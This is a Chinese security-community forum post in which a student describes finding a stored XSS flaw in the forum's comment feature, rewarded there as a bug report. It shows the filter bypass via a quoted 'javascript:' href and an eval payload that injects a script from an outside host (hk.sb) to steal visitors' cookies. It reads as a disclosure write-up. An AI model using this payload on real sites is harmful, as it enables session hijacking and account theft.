【14期-1班-小酒】论坛反射,dom,存储XSS。成功打到cookie

小酒   ·   发表于 2021-09-09 13:09:00   ·   漏洞文章

演示下效果

方便演示,我新发了一个帖子
https://bbs.zkaq.cn/t/5798.html

点击就会出弹出。

这是打到的cookie


使用cookie 登录时没有问题的。

发现的过程

1,过程起源于聂风老师的一句话。
聂风: 找漏洞,不是知道后端如何写的,再使用漏都代码。
而是,你认为他有漏洞,就去测试。结果并不重要
(原话忘记了,反正时这个意思)
2,分析:
xss漏洞,是用户输入的语句,当成前端代码执行了。 所以我第一个想到的就是论坛的发帖,以及评论。 当然这快肯定被学长搞了N遍了。 以前我一直认为论坛怎么可能会有漏洞。现在我换个思路,论坛一定有漏洞。

3,没说的,开始抓包。
为了,不占用资源,我测试的是评论
通过抓包发现:content_html,就是渲染再页面上面的。 很明显是url编码。这个老师都讲过


4,通过抓包,改包,发现过滤很多东西。创建新的标签,都会被过滤掉。我测试好久都不行。只能留下原有的标签。 于是我想到了, 超链接标签。

<p><a href="javascript:alert(1)" title="test">test</a></p>
同样的也是会把 JavaScript 过滤掉

但是,他保留了,alert(1)看到这个我觉得有点希望,只要我把JavaScript留下来就行了。 通过尝试,我发现在前面加上 单引号,会留下来
<p><a href="'javascript:alert(1)" title="test">test</a></p>


当然了,这个时候虽然把javascript:alert(1) 语句留下来了,但是是不起作用的。 我充实了很多办法。 大小写,或者拼接等等。 都不行。
忽然我想到了,可以试试不用ascii码(我对这个也不熟悉)


然后我就试着这些ascii码。 一个个是过去


发现了,这个。 加载JavaScript里面没有问题可以允许JavaScript。 这个时候我本地测试了。

。然后就跟最上面的演示效果一样了。

5.这个时候虽然可以执行alert 弹出。 但是达不到cookie。
我又想,既然alert可以执行,是不是可以执行其他函数,什么函数可以打到cookie呢?document.cookie? 好像不行。只能把cookie显示出来。

于是找了好多资料。 我发现又一个语句eval()函数,eval函数可以把字符串当成js语句执行。这个时候就好像发现了新大陆。 后面的大家都知道了。

eval('alert(\"金币+1\");var xj=document.createElement(\"script\");console.log(xj);xj.src=\'https:\/\/hk.sb/m6ss\';document.body.appendChild(xj);')
eval执行这个字符串就能够执行创建script标签,并且打到cookie
因为eval是把字符串当成字符串执行的。可以做很多操作。

用户名金币积分时间理由
奖励系统 100.00 0 2021-09-11 22:10:11 投稿满 10 赞奖励
奖励系统 50.00 0 2021-09-10 09:09:24 投稿满 5 赞奖励
Track-手电筒 400.00 0 2021-09-09 19:07:37 发现漏洞奖励

打赏我,让我更有动力~

11 条回复   |  直到 2021-12-16 | 2081 次浏览

17350816400
发表于 2021-9-9

评论列表

  • 加载数据中...

编写评论内容

小酒
发表于 2021-9-9

觉得好的, 点个赞

评论列表

  • 加载数据中...

编写评论内容

小孟子
发表于 2021-9-10

评论列表

  • 加载数据中...

编写评论内容

小孟子
发表于 2021-9-10

评论列表

  • 加载数据中...

编写评论内容

小孟子
发表于 2021-9-10

评论列表

  • 加载数据中...

编写评论内容

空白丶
发表于 2021-9-10

我觉得思路广,这个位置可能还会有bug。我也不知道现在修复成什么样子,如果还是去禁一些函数之内的。

评论列表

  • 加载数据中...

编写评论内容

WX
发表于 2021-9-11

评论列表

  • 加载数据中...

编写评论内容

蛋蛋超人
发表于 2021-9-12

66666

评论列表

  • 加载数据中...

编写评论内容

Track-聂风
发表于 2021-9-14

其实窃取到的Cookie也是无法登陆的。社区的Cookie都有http-only,其实只能打到部分的Cookie。

评论列表

  • 加载数据中...

编写评论内容

domren
发表于 2021-9-15

风哥都露面了,看来这事大了

评论列表

  • 加载数据中...

编写评论内容

shijie
发表于 2021-12-16

12313123

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.